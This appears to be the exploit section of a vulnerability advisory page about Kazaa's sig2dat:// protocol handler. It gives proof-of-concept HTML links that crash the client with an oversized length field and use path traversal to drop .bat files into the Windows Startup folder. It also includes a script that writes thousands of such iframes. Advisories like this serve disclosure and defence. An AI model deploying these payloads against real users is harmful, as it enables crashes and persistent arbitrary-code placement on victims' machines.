• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

To crash the affected application:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>

To create arbitrary files:

<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>

<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>